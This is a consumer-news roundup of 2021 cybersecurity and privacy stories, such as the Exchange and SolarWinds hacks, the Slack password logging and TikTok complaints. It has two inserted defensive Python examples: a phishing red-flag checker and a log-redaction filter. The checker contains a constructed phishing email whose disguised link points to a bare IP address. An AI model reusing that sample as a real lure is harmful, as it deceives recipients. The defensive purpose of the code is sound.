  • Look for spelling mistakes, grammar mistakes, and design issues. Serious companies and institutions don’t usually send out emails with bad grammar; email design is usually lean and precise.

  • Don’t click on links or download attachments. If it’s an email, hover your mouse over the link to see the destination. Check if it looks legitimate and, especially, if it contains the “https” part to indicate a secure connection. For other types of messages, it’s generally safer to search for the website yourself.

  • Consider context. Were you expecting such an email or message? If not, it is probably suspicious, especially if the offer seems too good to be true.  

  • Contact the company yourself. When in doubt, contact the company or institution over the phone or by using an alternative email address to confirm if the email is legitimate.

  • Report the incident to the authorities. If you notice something unusual, raising the alarm can help not only you, but others affected by the leak as well.
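The first three items on the list (who the message is really from, where a link really goes, and whether it uses https) can be checked mechanically, and the "consider context" item can be approximated by looking for pressure words in the subject line. The Python example below is added here; it is not code from the article or from NordVPN. It parses a constructed phishing-style message and a constructed legitimate one, and reports the same red flags Markuson describes. The brand allow-list `KNOWN_SENDERS`, the pressure-word list and all addresses in the sample messages are assumptions made for the example; the spelling and "contact the company yourself" checks are left to the reader, since they need a human. One caveat on the https item: a plain http link is a warning sign, but an https link only proves the connection is encrypted, not that the site is the one it claims to be, so the code treats https as necessary rather than sufficient.

```python
import re
from email import message_from_string
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allow-list for the example: brands the recipient deals with and
# the domains they really send from. A real deployment maintains its own.
KNOWN_SENDERS = {"example bank": ("example-bank.com",)}

# Subject-line pressure words: the "consider context" item, approximated.
URGENCY_WORDS = ("urgent", "suspend", "verify", "immediately", "expire")

# Constructed phishing-style message (not a real email) that trips every check.
SUSPICIOUS_EMAIL = """\
From: "Example Bank Security" <alerts@examp1e-bank-login.net>
Reply-To: recover@mail-recovery.example
To: customer@example.com
Subject: Urgent: you're account will be suspended
Content-Type: text/html

<html><body>
<p>Dear custommer, we detected unusual activty. Verify now:</p>
<a href="http://198.51.100.7/verify">https://www.example-bank.com/secure</a>
</body></html>
"""

# Constructed legitimate message from the same brand; should yield no findings.
BENIGN_EMAIL = """\
From: "Example Bank" <alerts@example-bank.com>
To: customer@example.com
Subject: Your monthly statement is ready
Content-Type: text/html

<html><body><p>Your statement is available at
<a href="https://www.example-bank.com/statements">www.example-bank.com</a>.</p>
</body></html>
"""


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every anchor in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = (dict(attrs).get("href") or ""), []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _domain(address):
    """Lower-cased domain part of an email address ('' if there is none)."""
    return address.rsplit("@", 1)[-1].lower() if "@" in address else ""


def _host(text):
    """Hostname named by a URL or bare domain, or None if text names none."""
    parsed = urlparse(text if "://" in text else "//" + text)
    host = (parsed.hostname or "").lower()
    return host if "." in host else None


def analyze_message(raw):
    """Return a list of human-readable red flags found in one RFC 822 message."""
    msg = message_from_string(raw)
    findings = []

    # 1. Sender: the display name versus the address actually used.
    name, addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(addr)
    for brand, domains in KNOWN_SENDERS.items():
        genuine = any(from_domain == d or from_domain.endswith("." + d) for d in domains)
        if brand in name.lower() and not genuine:
            findings.append(f"display name '{name}' claims {brand} but address is at {from_domain}")
    reply_domain = _domain(parseaddr(msg.get("Reply-To", ""))[1])
    if reply_domain and reply_domain != from_domain:
        findings.append(f"Reply-To domain {reply_domain} differs from From domain {from_domain}")

    # 2. Context: pressure words in the subject line.
    hits = [w for w in URGENCY_WORDS if w in msg.get("Subject", "").lower()]
    if hits:
        findings.append(f"subject uses pressure words: {', '.join(hits)}")

    # 3. Links: what the anchor text shows versus where the href really goes.
    payload = msg.get_payload(decode=True) or b""
    collector = _LinkCollector()
    collector.feed(payload.decode(msg.get_content_charset() or "utf-8", "replace"))
    for href, text in collector.links:
        href_host, text_host = _host(href), _host(text)
        if urlparse(href).scheme.lower() != "https":
            findings.append(f"link {href} does not use https")
        if href_host and re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", href_host):
            findings.append(f"link destination {href_host} is a bare IP address")
        if text_host and href_host and text_host != href_host:
            findings.append(f"link text shows {text_host} but points to {href_host}")
    return findings
```

Running `analyze_message(SUSPICIOUS_EMAIL)` lists six flags (impersonating display name, mismatched Reply-To, pressure words, http link, bare-IP destination, link text that hides the destination), while `analyze_message(BENIGN_EMAIL)` returns an empty list. The heuristics are deliberately simple; a mail gateway would add sender authentication results (SPF, DKIM, DMARC) and attachment scanning on top of them.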

“Everyone can become a victim of phishing scams,” Markuson said. “Although some of them are pretty obvious, others can be challenging to spot. As a prevention measure, use cyber security software such as VPNs, antiviruses, spam filters, and firewalls.”

ConsumerAffairs has a guide on data protection. It covers rates, reviews, and other information about companies that offer data protection services. It’s available here.

It should be noted that Facebook Security extended support for mobile security keys to Facebook iOS/Android users on March 18. The team suggested that users employ security keys to help ensure that passwords aren’t the last line of defense between an attacker and a user’s account.

Stanford University discloses data leak affecting multiple colleges and organizations

On Thursday, Stanford University announced that it’s looking into the alleged theft of personal data from those in the School of Medicine community. 

Hackers reportedly gained access to information in a 20-year-old file transfer system used by the school. The cybercriminals stole data including Social Security numbers, addresses, emails, family members and financial information. 

“Stanford University School of Medicine has learned that cybercriminals have claimed they have stolen some School of Medicine data,” the university said. “We are investigating this incident and we have reported the incident to law enforcement.” 

At this time, school officials aren’t sure how many people were affected by the breach. The incident has been reported to law enforcement.

“We are working to determine whether individuals’ personal data has been affected, and we will notify any affected individual,” the university said. “We take data protection very seriously, and as a best practice, we recommend that all individuals remain vigilant and promptly report any suspicious activity or suspected identity theft to the Stanford School of Medicine.”

Part of a larger attack

Stanford said the hack was part of a larger national cyberattack on universities and organizations that use Accellion, a widely used file transfer service. 

Other victims of the attack include the University of Colorado, Washington State’s auditor, Australia’s financial regulator, the Reserve Bank of New Zealand and U.S. law firm Jones Day. Some institutions received ransom demands from the hackers. The bad actors threatened to leak more information unless they received money. 

“This is a 20-year-old legacy system. And these are notoriously insecure,” said Jack Cable of the Stanford Daily. “This is something that’s endemic across probably all universities and large companies, in that they’re dependent on software that is really old and is likely pretty vulnerable. That’s why we’re seeing so many breaches.”

New Android hack could allow cybercriminals to take over users’ devices

Users of Apple iOS devices welcomed the week with a security threat. Now, Android users are being warned of malware posing as a security update that can allow hackers to take complete control of devices. 

The sophisticated new malicious app disguises itself as a System Update application, according to mobile security company Zimperium (zLabs). Once it takes control of an Android device, it’s able to steal data, images, and messages. Once they infiltrate a device, hackers can also record audio and phone calls, take photos, monitor GPS locations, steal phone contacts, take instant messenger database files, review browser history, access WhatsApp messages, and more. 

Worse yet, it can do its damage undetected by hiding the icon from the device’s drawer/menu.

Stay away from third-party software sites

zLabs confirmed with Google that the app is not -- and has never been -- on Google Play. However, users who download system software from unsecured, third-party platforms can be targeted and become victims if they’re not careful.

Before clicking “accept” on any app update or installing a new app on an Android device, users should ask themselves where exactly that software is coming from. Software from the Google Play store is probably safe, but users should avoid installing anything that arrived via text message unless it comes from a trusted source they know and have installed software from before. 

One telltale sign of this scheme is any Android update that is offered in the form of a new, self-contained app. Android updates do not come packaged like that. 

iOS software update fixes ‘potentially serious’ security breach

Apple users who have been on pins and needles about a critical security breach can rest easy. On Friday, the company released a new update for its iOS software system that fixed the issue.

Specifically, the new update impacts Webkit, a browser engine developed by Apple and used primarily in its Safari web browser on various Apple devices. The original problem reported to Apple suggested that Webkit contained a vulnerability that would allow “maliciously crafted web content” to create “universal cross site scripting.” The company said it was aware that the threat may have been actively exploited.

Apple has its peer Google to thank for finding the threat. The issue was first detailed by members of Google’s Threat Analysis Group.

Who should be concerned and what should be done

Apple reaffirmed the importance of iOS users updating their software, saying the update “provides important security updates and is recommended for all users.”

Consumers who own at least one of the following Apple products should update their system software as soon as possible:

  • iPhone: iPhone 6s and later

  • iPad: iPad Pro (all models); iPad Air 2 and later; iPad 5th generation and later; iPad mini 4 and later

  • iPod Touch (7th generation)

The iOS and iPadOS 14.4.2 updates are free and can be downloaded on all of the aforementioned devices via the Settings app. To access the software update, go to Settings > General > Software Update.

Microsoft releases ‘one-click’ tool to patch Exchange server vulnerability

Microsoft has released a “one-click” tool that enables smaller companies to patch the critical “Hafnium” vulnerability disclosed by the company earlier this month. 

Security researchers warned last week that four bugs in the Microsoft Exchange email and calendar servers were at risk of being used in attacks by the Chinese espionage group Hafnium. The Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) said it was "aware of widespread domestic and international exploitation" of the bugs. 

Microsoft recently released a patch for the flaw (CVE-2021-26855), but it was primarily designed for large organizations with dedicated IT or security teams capable of executing the complex fix. Now, the tech giant has released an easier-to-install tool for smaller firms without such teams. 

“...we realized that there was a need for a simple, easy to use, automated solution that would meet the needs of customers using both current and out-of-support versions of on-premises Exchange Server,” Microsoft said. 

Mitigating the flaw

The tech giant said the tool will guard against attacks that have been seen so far, but it won’t prevent future attacks and isn’t a replacement for the other Exchange patches. However, the company said it is “the fastest and easiest way to mitigate the highest risks to internet-connected, on-premises Exchange servers prior to patching.” 

“This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update,” Microsoft said in a blog post. “By downloading and running this tool, which includes the latest Microsoft Safety Scanner, customers will automatically mitigate CVE-2021-26855 on any Exchange server on which it is deployed.”

The company’s “one-click” mitigation tool can be accessed here. 

Four bugs in Microsoft Exchange Server are being actively exploited in widespread attacks

Security researchers are warning that four zero-day vulnerabilities in Microsoft Exchange are now being used in attacks against thousands of organizations. 

Microsoft said Exchange customers should apply the emergency patches that it recently released as soon as possible because "nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems."

Over the weekend, the Department of Homeland Security's Cybersecurity and Infrastructure Security Agency (CISA) said it was "aware of widespread domestic and international exploitation" of the vulnerabilities. 

Easy-to-exploit bugs 

The bugs -- which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065 -- are being used in attacks by a Chinese espionage group known as “Hafnium,” researchers said. The group was found to have deployed “web shells” on compromised Microsoft Exchange Servers with the aim of stealing data and installing malware. 

“Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs,” Microsoft said. “HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers. Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”

Chris Krebs, the former director of CISA, believes state and local government agencies and small businesses will be more widely affected by the attacks than large enterprises. 

"Incident response teams are BURNED OUT & this is at a really bad time," Krebs wrote. 

Around 30,000 organizations in the U.S. have been affected by the attacks, according to Brian Krebs of KrebsOnSecurity.com. 

"The intruders have left behind a ‘web shell,’ an easy-to-use, password-protected hacking tool that can be accessed over the Internet from any browser. The web shell gives the attackers administrative access to the victim's computer servers," Krebs said. 

Senators ask FTC to stop exploitation on people search sites

Sens. Amy Klobuchar (D-MN) and Lisa Murkowski (R-AK) are calling on the Federal Trade Commission (FTC) to combat stalkers’ exploitation of people search websites. 

In a letter to the agency, the senators said there’s a clear need for action to protect people who have been, or may become, victims of abuse and stalking as a direct result of information gleaned through people search sites. 

“We write to express serious concerns about recent reports that data brokers are publicizing the location and contact information of victims of domestic violence, sexual violence, and stalking,” the senators wrote. “We have serious concerns that third-party data brokers play a role in revealing [a] protected address and providing access to personal information that can lead to continued abuse.”

The senators suggested the possibility of introducing measures to help people remove their addresses from data brokers like WhitePages and Spokeo, which market themselves as tools akin to digital phone books. The sites offer phone numbers, email addresses, physical addresses, and more. 

Easily accessible information

Getting information taken down from sites like these (of which there are dozens) can be time-consuming and often requires the submission of personal data via physical letters or even faxes. The fact that people search sites automatically scrape personal data complicates matters further. 

"One in four women and one in nine men experience intimate partner violence," the senators wrote in the letter, adding that victims “often are forced to relocate to a relative’s house to find safety.” 

“The availability of this data makes it difficult or impossible for victims to safely relocate with relatives,” they added. 

Klobuchar and Murkowski want the FTC to come up with a plan to work with other agencies to keep violent abuse perpetrators from accessing personal information. They also want to help educate victims about data broker services and offer resources on what to do if their information falls into the wrong hands. 

The senators also asked if the FTC has plans to prevent brokers from “collecting, buying, or selling lists of vulnerable populations.”

Google says it will stop selling ads based on tracking

If you feel like internet ads follow you everywhere you go, there may be some good news on the horizon. In a monumental shift, Google is giving tracking technologies the boot, announcing that it plans to stop selling ads based on individuals’ browsing across multiple websites.

It’s undetermined exactly how much cutting that slice out of Google’s ad business will set the company back, but it could be plenty. According to Statista, Google's total ad revenue in 2020 amounted to $146.92 billion spread across its extensive ad network. Nonetheless, the important pro-consumer point here is that Google seems to be more concerned with what it calls an “erosion of trust” from people who venture out online. 

“As our industry has strived to deliver relevant ads to consumers across the web, it has created a proliferation of individual user data across thousands of companies, typically gathered through third-party cookies,” explained David Temkin, Google’s Director of Product Management, Ads Privacy and Trust.

“This has led to an erosion of trust: In fact, 72 percent of people feel that almost all of what they do online is being tracked by advertisers, technology firms or other companies, and 81 percent say that the potential risks they face because of data collection outweigh the benefits, according to a study by Pew Research Center. If digital advertising doesn't evolve to address the growing concerns people have about their privacy and how their personal identity is being used, we risk the future of the free and open web.”

What changes to expect

This change won’t happen overnight, but there is already forward progress. As a precursor to this move, the company announced in late January that it was going to phase out third-party tracking cookies in its Chrome browser. Once third-party cookies are completely phased out, Temkin vowed that Google will not build alternate identifiers to track individuals as they browse across the web, nor will the company use them in its products.

In its cookieless future, Google wants everything relating to advertising -- targeting, measurement, and fraud prevention -- to be in line with the standards set by its own Privacy Sandbox. If all goes according to plan, cookies will be replaced by application programming interfaces (API) that advertisers will use to gather five unique pieces of data, including how well an ad performed and what platform actually leveraged a purchase out of an ad on its site(s). 

“The most significant item in the Privacy Sandbox is Google’s proposal to move all user data into the browser where it will be stored and processed,” Amit Kotecha, marketing director at data management platform provider Permutive, told Digiday. “This means that data stays on the user’s device and is privacy compliant. This is now table stakes and the gold standard for privacy.”

Google seems to be one of the few companies going in on this new privacy venture; there are still dozens of digital ad networks that are mum on the subject -- at least for now.

“We realize this means other providers may offer a level of user identity for ad tracking across the web that we will not — like [personally identifiable information] based on people’s email addresses,” Temkin said. 

“We don’t believe these solutions will meet rising consumer expectations for privacy, nor will they stand up to rapidly evolving regulatory restrictions, and therefore aren’t a sustainable long term investment. Instead, our web products will be powered by privacy-preserving APIs which prevent individual tracking while still delivering results for advertisers and publishers.”

TikTok faces consumer law violation complaint in Europe

Europe’s leading consumer advocacy group -- the Bureau Européen des Unions de Consommateurs (BEUC) -- has filed a complaint against TikTok over claims that the Chinese-owned app violated the bloc’s data privacy laws. 

The BEUC has accused TikTok of violating General Data Protection Regulation (GDPR) through its alleged “unclear” terms of service and by "failing to protect children and teenagers from hidden advertising and inappropriate content."

The complaint was filed in the wake of several reports that analyzed the video-sharing app’s approach to consumer protection through its data protection practices and privacy procedures. 

Hidden advertising

In a press release, the BEUC accused TikTok of allowing companies to peddle their products in a way that young users might not see as advertising. 

“Users are for instance triggered to participate in branded hashtag challenges where they are encouraged to create content of specific products,” the BEUC wrote. “As popular influencers are often the starting point of such challenges the commercial intent is usually masked for users. TikTok is also potentially failing to conduct due diligence when it comes to protecting children from inappropriate content such as videos showing suggestive content which are just a few scrolls away.” 

The group also argues that the app isn’t doing enough to prevent underage users from registering for an account. 

“In practice, it is very easy for underage users to register on the platform as the age verification process is very loose and only self-declaratory,” the BEUC said, citing a number of studies that have suggested that children make up “a very big part” of the app’s user base. 

Data collection concerns

With regard to data collection, the BEUC accused the Chinese-owned app of repeatedly changing its data and protection practices in Europe without publicly disclosing that it had done so. The group claims TikTok has an “ambiguous” privacy policy that doesn’t give users a clear picture of the ways in which it collects and uses personal information. 

The BEUC noted that TikTok’s terms and conditions grant it an “irrevocable right to use, distribute and reproduce the videos published by users, without remuneration.” Also problematic to the group is the app’s lack of an opt-out feature that users can select if they would prefer not to have their personal data collected for advertising. 

Consumer organizations in 15 countries are now pushing for authorities to investigate TikTok.

TikTok said in a statement to Reuters that it's "always open to hearing how we can improve” and that it has contacted BEUC about potentially scheduling a meeting “to listen to their concerns.” The company also said it provides an in-app summary of its privacy policy that it claims was crafted to be easy for teens to understand.

Slack says Android users’ passwords were left exposed for a month on its platform

Slack has emailed some Android users to say that, for a period of time, its Android app erroneously logged their passwords in plain text. The emails sent to affected users contain a link to perform a password reset. Android Police noted that the email might look like a phishing attempt to some people, but it’s legitimate. 

“It's safe to click, or you can navigate to Slack's site directly yourself, sign in there, and reset your password manually,” the site reported. 

Slack said the logging “bug” took effect on December 21, 2020, but it apparently wasn’t caught and fixed until January 21, 2021. Over the course of those 31 days, Slack for Android may have logged users’ passwords in an unencrypted format.

Slack said the issue only impacted a small subset of Android users. However, anyone who uses Slack for Android on a regular basis may want to change their password even if they didn’t receive an email saying they should do so. 

Wiping logs

In addition to choosing a new “complex and unique password,” affected users are also advised to clear the storage of Slack for Android so that any potentially password-containing logs are wiped from the device. 
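The failure described in this article, a debug log that receives a whole sign-in request, is easy to reproduce and to guard against. The Python example below is added here and is not Slack’s code (the Android app is not written in Python); it shows a constructed sign-in logger that leaks the password, a `logging.Filter` that redacts common secret field names as a safety net, and the preferable fix of logging only an allow-listed view of the request. The field names in `SECRET_FIELDS`, the logger names and the sample credentials are all constructed for the example.

```python
import io
import logging
import re

# Field names whose values must never reach a log line (constructed list).
SECRET_FIELDS = ("password", "passwd", "pwd", "token", "secret")

# Matches key=value, "key": "value" and 'key': 'value' forms; group 2 is the value.
_SECRET_RE = re.compile(
    r"(?i)(['\"]?(?:%s)['\"]?\s*[:=]\s*)('[^']*'|\"[^\"]*\"|[^\s,;}]+)"
    % "|".join(SECRET_FIELDS)
)


def redact_text(text):
    """Replace the value of any secret field found in free text with a marker."""
    return _SECRET_RE.sub(r"\1[REDACTED]", text)


class RedactingFilter(logging.Filter):
    """Safety net: scrub secrets from each record before the handler writes it.

    The message is formatted first so that %-style arguments (for instance a
    dict holding the whole request) are covered too; the args are then cleared.
    """

    def filter(self, record):
        record.msg = redact_text(record.getMessage())
        record.args = ()
        return True


def safe_fields(payload, secrets=SECRET_FIELDS):
    """Preferred fix: an allow-listed view of the request that is safe to log."""
    return {k: v for k, v in payload.items() if k.lower() not in secrets}


def capture_signin_log(redact):
    """Run a constructed sign-in flow against an in-memory handler; return the log text."""
    stream = io.StringIO()
    handler = logging.StreamHandler(stream)
    handler.setFormatter(logging.Formatter("%(levelname)s %(message)s"))
    if redact:
        handler.addFilter(RedactingFilter())
    logger = logging.getLogger("example.signin." + ("redacted" if redact else "raw"))
    logger.handlers.clear()
    logger.propagate = False
    logger.setLevel(logging.DEBUG)
    logger.addHandler(handler)

    # Constructed credentials, not real ones.
    payload = {"email": "user@example.com", "password": "correct horse battery staple"}
    # The mistake the article describes: a debug line that receives the whole request.
    logger.debug("sign-in request: %s", payload)
    logger.debug("session token=%s issued", "tok_constructed_123")
    # The hardened call site: only fields that are safe to log.
    logger.info("sign-in request (safe view): %s", safe_fields(payload))
    return stream.getvalue()
```

With `redact=False` the captured log contains the password and the token verbatim; with `redact=True` both are replaced by `[REDACTED]` while the email address survives. The filter is a backstop, not the fix: debug-level logging of request objects should be removed, and once a secret has been written, as the article notes, the existing log files still have to be wiped.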

Slack assured users that it has rolled out “a fixed version” of the Android app. Additionally, it has “blocked usage of the impacted version(s).” 

“We very much regret any inconvenience we have caused,” Slack said in the email. 

TikTok sale to U.S. firm on hold ‘indefinitely’

TikTok’s forced sale to Oracle and Walmart has been put on hold “indefinitely” now that the Biden administration has taken the reins, according to The Wall Street Journal. 

Last year, Trump ordered the sale of TikTok to a majority U.S.-ownership group over concerns about data security, as well as the potential for the video sharing app’s algorithm to be used to advance Chinese political goals. 

After being pushed back several times, the deadline for the sale was ultimately moved to December 4. That date came and went with no response from the outgoing administration. Now, Biden administration officials say the deal is on hold while the new president reviews past efforts to mitigate security risks from Chinese technology firms. 

“We plan to develop a comprehensive approach to securing U.S. data that addresses the full range of threats we face,” National Security Council spokeswoman Emily Horne told the Journal. “This includes the risk posed by Chinese apps and other software that operate in the U.S. In the coming months, we expect to review specific cases in light of a comprehensive understanding of the risks we face.”

TikTok may use a third party for data

TikTok is reportedly still talking to the Committee on Foreign Investment in the U.S. (CFIUS) about resolving security concerns. However, sources familiar with the matter told the Journal that any deal reached “would likely be different from the one discussed last September.” 

Instead of a sale, a source said that one resolution might involve sending TikTok data to a “trusted third party” to prevent the Chinese government from having access to Americans’ info. The newly installed administration has until February 18 to offer a formal response to TikTok’s legal situation. 

Huawei asks courts to overturn FCC’s national security threat designation

Chinese telecommunications manufacturer Huawei has asked a court to overturn the Federal Communications Commission’s (FCC) late 2020 classification of it as a national security threat.

Huawei has a tainted reputation on Capitol Hill, starting when it came under scrutiny for allegedly implanting malicious hardware or software into its components and systems. The company maintains that the FCC overstepped the boundaries of its authority in issuing the new designation. 

“The order on review potentially impacts the financial interests of the telecommunications industry as a whole,” Huawei’s request said. By “whole,” the company is referring to network operators the FCC locked out of buying Huawei-made parts. 

The latest skirmish is not Huawei’s first with the FCC. In 2019, the agency voted to cut off any federal funds used to buy Huawei products. That move grew into a bill that officially prevented U.S. companies from rolling out wireless networks with Huawei’s equipment -- or that of its Chinese peer, ZTE. Huawei also tried to reverse that decision but came up empty. 

The FCC added even more misery for the telecom maker in December 2020 by voting to make companies replace existing Huawei equipment.

Biden’s FCC backs up Trump’s FCC

The Trump administration was not exactly Chinese commerce’s best friend. From attempts to ban popular China-based phone apps like TikTok and WeChat to a slugfest over trade issues, Trump took it to China with both fists. 

If China was hoping for a respite from the Biden administration, the FCC’s move is the first to dash those hopes. To date, President Biden has not made a move to keep the war on TikTok alive, but his administration is supporting what the Trump administration’s FCC did in its Huawei decree. 

“Last year the FCC issued a final designation identifying Huawei as a national security threat based on a substantial body of evidence developed by the FCC and numerous U.S. national security agencies. We will continue to defend that decision,” a spokesperson told The Verge.

Google blocks ‘The Great Suspender’ extension due to malware

Google has blocked a popular Chrome extension called “The Great Suspender” because it was found to contain malware. 

On Thursday, Chrome users with the extension installed started seeing a message that read: “[The Great Suspender] has been disabled because it contains malware.” Google has also pulled the extension from its Chrome Web Store. 

The Great Suspender was previously a helpful tool that would automatically force any tabs that users hadn’t looked at in a while to go to “sleep,” which helped conserve memory and keep the browser moving quickly. 

Now that the extension is gone, Reddit users have found a way to get tabs back; however, the process is somewhat tedious. There are also a few extensions that work similarly to The Great Suspender, including Session Buddy and OneTab. Users can also keep their browser running quickly by simply limiting the number of tabs that are open.

Google says North Korean state hackers are targeting security researchers via social media

By hook or crook, foreign actors continue to try to worm their way into U.S. companies and internet platforms. 

On Tuesday, CNBC reported that Google has uncovered a new twist in the cyber spy game, courtesy of North Korean state hackers who are trying yet another hacking angle. This time, it appears they’re targeting security researchers directly on social media.

Google’s Threat Analysis Group (TAG) uncovered a campaign in which bad actors worked a confidence ploy to create credibility with security researchers by building out a research blog. The fraudsters also created multiple Twitter profiles and personas on LinkedIn, Telegram, Discord, Keybase, and via email so they could interact with potential targets. A brassy bunch, the actors even used their new Twitter profiles for posting links to their blog and posting videos of their claimed exploits.

Anyone concerned should pay attention to the details

To date, Google’s threat analysts say they’ve only seen these actors targeting Windows systems as a part of this campaign and that even computers running "fully patched and up-to-date Windows 10 and Chrome browser versions" still got infected.

Nonetheless, a red flag has been raised, and Google recommends that potential targets compartmentalize their research activities by “using separate physical or virtual machines for general web browsing, interacting with others in the research community, accepting files from third parties and your own security research.”

To help identify the sites, blogs, and accounts to stay away from, TAG has published a full list of actor-controlled sites and accounts. It’s available here.

Google remains vigilant about security issues. To help circle the wagons against digital insurrections, the company offers rewards of up to $150,000 for anyone who can lead them to Chrome-related vulnerabilities like the ones leveraged in this situation.

U.S. security firm Malwarebytes says it was targeted by SolarWinds hackers

Cybersecurity firm Malwarebytes has disclosed that it was targeted by the same group of hackers behind the breach of IT software company SolarWinds. 

The firm said it doesn’t use SolarWinds’ IT software, through which hackers were able to break into the systems of companies including FireEye, Microsoft, and CrowdStrike. Instead, Malwarebytes said it was infiltrated using another intrusion vector. 

The bad actors were able to breach the firm’s internal systems by exploiting a dormant email protection product within its Office 365 tenant, the company said. 

“We can confirm the existence of another intrusion vector that works by abusing applications with privileged access to Microsoft Office 365 and Azure environments,” wrote Marcin Kleczynski, Malwarebytes co-founder and current CEO. 

Malwarebytes products ‘remain safe to use’

Malwarebytes said it found out about the intrusion on December 15, after the Microsoft Security Response Center detected suspicious activity in the dormant Office 365 app. The activity was “consistent with the tactics, techniques and procedures” deployed by the hackers who carried out the SolarWinds attacks.

After learning of the breach, the company said it quickly launched an internal investigation to determine what hackers were able to gain access to. Malwarebytes said its anti-malware users can be assured that its software remains safe to use since it doesn’t use Microsoft’s Azure cloud services.

“After an extensive investigation, we determined the attacker only gained access to a limited subset of internal company emails,” Kleczynski said. “We found no evidence of unauthorized access or compromise in any of our internal on-premises and production environments.” 

Malwarebytes’ announcement that it was targeted by the SolarWinds attackers brings the total number of affected security vendors to four. The group of threat actors previously targeted FireEye, Microsoft, and CrowdStrike in what is believed to have been an attempt to gather intelligence. 

Officials from the FBI, NSA, and Cybersecurity and Infrastructure Security Agency (CISA) recently put out a joint statement naming the Russian government as the most likely culprit behind the cyber-espionage attacks. 

SolarWinds hack bears similarities to tool used by Russian hackers

Investigators said Monday that the hackers behind the global SolarWinds incident used computer code with links to known Russian spying tools, Reuters reports. 

It recently came to light that cyber criminals hacked SolarWinds to gain access to at least 18,000 government and private networks. It is believed that the cyberattackers’ goal was to collect intelligence. 

Now, researchers at Moscow-based cybersecurity company Kaspersky said the attackers deployed code that closely resembled malware associated with a Russian hacking group known as “Turla.” 

The way in which the SolarWinds hack was carried out had three notable similarities to a hacking tool called “Kazuar,” which is used by Turla, according to Costin Raiu, head of global research and analysis at Kaspersky.

Similarities were noted in how the hackers identified their victims and how they avoided being detected through the use of a specific formula to calculate periods with the viruses lying dormant. Additionally, both pieces of malware attempted to obscure their functions from security analysts.  

“One such finding could be dismissed,” Raiu said. “Two things definitely make me raise an eyebrow. Three is more than a coincidence.”

Connection likely

Raiu said the similarities point to the likelihood of a link between the two hacking tools, but they don’t necessarily imply that Turla played a role in the SolarWinds hack. He said there’s a possibility that the hackers behind the SolarWinds hack were merely inspired by Kazuar, or that they deliberately planted “false flags” in order to throw off investigators. 

Although Moscow has denied involvement in the hack, U.S. intelligence agencies have said that the hackers were “likely Russian in origin.” Security firms in the U.S. and other countries are continuing to investigate the incident in order to determine its full scope, and the Department of Justice has vowed to take serious action. 

“As part of the ongoing technical analysis, the Department has determined that the activity constitutes a major incident under the Federal Information Security Modernization Act, and is taking the steps consistent with that determination,” the agency said last week. “The Department will continue to notify the appropriate federal agencies, Congress, and the public as warranted.”

Justice Department confirms that it was part of the SolarWinds hack

After sitting on the news for almost two weeks, the U.S. Department of Justice (DOJ) has confirmed that its email systems fell prey to the same band of cyberattackers linked to the global SolarWinds incident that has affected government and private sector businesses.

“On Dec. 24, 2020, the Department of Justice’s Office of the Chief Information Officer (OCIO) learned of previously unknown malicious activity linked to the global SolarWinds incident that has affected multiple federal agencies and technology contractors, among others. This activity involved access to the Department’s Microsoft O365 email environment,” DOJ spokesman Marc Raimondi said in a statement.

Raimondi went on to say that the number of affected email boxes was limited to around 3 percent and that the agency has no indication that any of its classified systems were impacted.

“A major incident”

According to a joint statement issued by the recently organized Cyber Unified Coordination Group -- which includes the FBI, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence, and the National Security Agency -- the hackers are “likely Russian in origin” and “responsible for most or all of the recently discovered, ongoing cyber compromises of both government and non-governmental networks.”

The group’s investigation is ongoing, and it’s possible they could turn up additional government victims. In the group’s estimation, the hackers’ goal appeared to be collecting intelligence, rather than anything destructive.

Nonetheless, the attack on the DOJ was serious enough that the agency has vowed to take action.

“As part of the ongoing technical analysis, the Department has determined that the activity constitutes a major incident under the Federal Information Security Modernization Act, and is taking the steps consistent with that determination,” the agency said. “The Department will continue to notify the appropriate federal agencies, Congress, and the public as warranted.”

President Trump bans WeChat Pay and several other Chinese apps

President Trump has signed an executive order banning several Chinese payment apps, including Alipay and WeChat Pay. 

A senior administration official said the order, which was signed late in the day on Tuesday, aims to keep American user data from being shared with the Chinese government. The Trump administration cited the possibility that the apps mentioned in the order could be used as a “mass tool for global oppression.”

“The United States must take aggressive action against those who develop or control Chinese connected software applications to protect our national security,” the order said.

In total, eight Chinese apps are banned under the order: Tencent QQ, CamScanner, SHAREit, VMate, WPS Office, QQ Wallet, Alipay, and WeChat Pay. 

National security concerns

The U.S. government has concluded that the apps named in the order automatically capture “sensitive personally identifiable... and private information” from millions of users in the United States. President Trump is concerned that the apps could be used to track and build dossiers of personal information on federal employees.

“At this time, action must be taken to address the threat posed by these Chinese connected software applications,” Trump wrote. 

The order will take effect after 45 days, which leaves open the possibility that President-elect Joe Biden will revoke it. The incoming presidential administration has yet to say how it plans to handle the order. 

The Trump administration has previously attempted to ban Chinese-based apps like TikTok and WeChat over national security concerns. Both attempts were unsuccessful. 

In 2019, the administration launched a trade war against Beijing and blacklisted Huawei Technologies, ZTE, and other Chinese firms over national security concerns. The Federal Communications Commission (FCC) has designated Huawei and ZTE as national security threats, but both companies have denied that they share data with the Chinese government.

T-Mobile admits to its fourth data breach in three years

T-Mobile’s cybersecurity team is once again being put to the test. On Monday, the phone carrier announced that it experienced its fourth data breach in three years. 

The company did not say what portion of its nearly 100 million user accounts were at risk, but it did confirm that the data accessed did not include names on the account, physical or email addresses, financial data, credit card information, social security numbers, tax IDs, passwords, or PINs.

